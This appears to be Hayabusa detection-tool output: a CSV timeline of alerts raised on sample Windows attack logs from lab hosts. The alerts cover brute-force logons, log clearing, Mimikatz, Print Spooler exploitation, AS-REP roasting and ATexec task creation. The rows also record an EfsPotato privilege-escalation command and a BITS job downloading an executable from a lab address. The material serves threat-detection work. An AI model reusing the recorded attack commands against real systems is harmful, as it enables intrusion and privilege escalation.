User: sshd_4332 : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4624,low,Logon Type 5 - Service,User: sshd_4332 : Workstation: - : IP Address: - : Port: - : LogonID: 0x47a203c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:18.227 +09:00,fs01.offsec.lan,4648,informational,Explicit Logon,Source User: FS01$ : Target User: admmig : IP Address: - : Process: C:\Program Files\OpenSSH-Win64\sshd.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:22.562 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:22.562 +09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:5 IpAddress:- timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,- -2021-05-22 05:43:49.345 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: 
Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:50.131 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:50.607 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-22 05:43:50.866 +09:00,fs01.offsec.lan,4625,low,Logon Failure - Wrong Password,User: admmig@offsec.lan : Type: 8 : Workstation: FS01 : IP Address: - : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Bruteforce/ID4625-OpenSSH brutforce with valid user.evtx -2021-05-23 06:56:57.685 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx -2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx -2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx -2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47156 : LogonID: 0x312517c1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,critical,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47160 : LogonID: 0x31251a6a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,critical,CVE-2021-1675 Print Spooler Exploitation IPC 
Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:34.373 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65333 : LogonID: 0x31251ce4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:34.375 +09:00,mssql01.offsec.lan,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65335 : LogonID: 0x31251d11,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65336 : LogonID: 0x31251d23,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-26 22:02:34.380 
+09:00,mssql01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 65337 : LogonID: 0x31251d36,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx -2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,medium,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx -2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,informational,Kerberos TGT was requested,User: admin-test : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0 : PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx -2021-06-01 23:06:34.542 +09:00,fs01.offsec.lan,4720,medium,Local user account created,User: WADGUtilityAccount : SID:S-1-5-21-1081258321-37805170-3511562335-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" -2021-06-01 23:08:21.225 +09:00,fs01.offsec.lan,4720,medium,Local user account created,User: elie : SID:S-1-5-21-1081258321-37805170-3511562335-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" -2021-06-01 23:09:38.437 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe 
[result] count:1 TaskName:\\Microsoft\\SynchronizeTimeZone timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- -2021-06-03 21:17:56.988 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx -2021-06-03 21:18:12.941 +09:00,fs01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx -2021-06-03 21:18:12.942 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 56061 : LogonID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1090-Proxy/ID4688-netsh port forwarding abuse.evtx -2021-06-04 03:34:12.672 +09:00,fs01.offsec.lan,4104,high,Windows Firewall Profile Disabled,,rules/sigma/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx -2021-06-04 04:17:44.873 +09:00,fs01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx -2021-06-04 04:39:52.893 +09:00,fs01.offsec.lan,2003,low,USB Device 
Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx -2021-06-04 04:39:52.895 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx -2021-06-04 04:39:53.056 +09:00,fs01.offsec.lan,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx -2021-06-04 17:41:47.982 +09:00,exchange01.offsec.lan,6,high,Failed MSExchange Transport Agent Installation,,rules/sigma/other/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx -2021-06-04 17:41:48.041 +09:00,exchange01.offsec.lan,6,high,Failed MSExchange Transport Agent Installation,,rules/sigma/other/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx -2021-06-10 04:29:58.239 +09:00,fs01.offsec.lan,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx -2021-06-10 04:29:58.240 +09:00,fs01.offsec.lan,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered 
Execution/ID19-20-WMI registration via PowerLurk.evtx -2021-06-10 04:29:58.392 +09:00,fs01.offsec.lan,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx -2021-06-11 06:21:20.636 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 51503 : LogonID: 0x5a4175e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" -2021-06-11 06:21:26.357 +09:00,fs01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 56594 : LogonID: 0x5a41984,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" -2021-06-11 06:21:26.383 +09:00,-,-,low,Rare Schtasks Creations,[condition] count() by TaskName < 5 in timeframe [result] count:2 TaskName:\\bouWFQYO timeframe:7d,rules/sigma/builtin/security/win_rare_schtasks_creations.yml,- -2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. 
arg.).evtx -2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" -2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx -2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" -2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx -2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask 
creation (GLOBAL).evtx" -2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx -2021-06-11 06:21:29.441 +09:00,fs01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: Temp\bouWFQYO.tmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" -2021-06-13 15:17:18.087 +09:00,sv-dc.hinokabegakure-no-sato.local,59,informational,Bits Job Creation,Job Title: test : URL: http://192.168.10.254:80/calc.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/YamatoSecurity/T1197_BITS Jobs/Windows-BitsClient.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 
+09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: c:\temp\EfsPotato.exe whoami : Path: C:\temp\EfsPotato.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\temp\EfsPotato.exe whoami,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:52.250 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe"" -Embedding : Path: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-10-19 23:33:13.262 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1201-Password Policy Discovery/ID4688-Password policy discovery via commandline.evtx -2021-10-19 23:40:28.001 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4688-Group discovery via commandline.evtx -2021-10-19 23:42:41.218 +09:00,FS03.offsec.lan,4728,medium,User added to global security group,Member added: - : SID: S-1-5-21-3410678313-1251427014-1131291384-1004 : Group: None : Subject user: admmig : Subject domain: 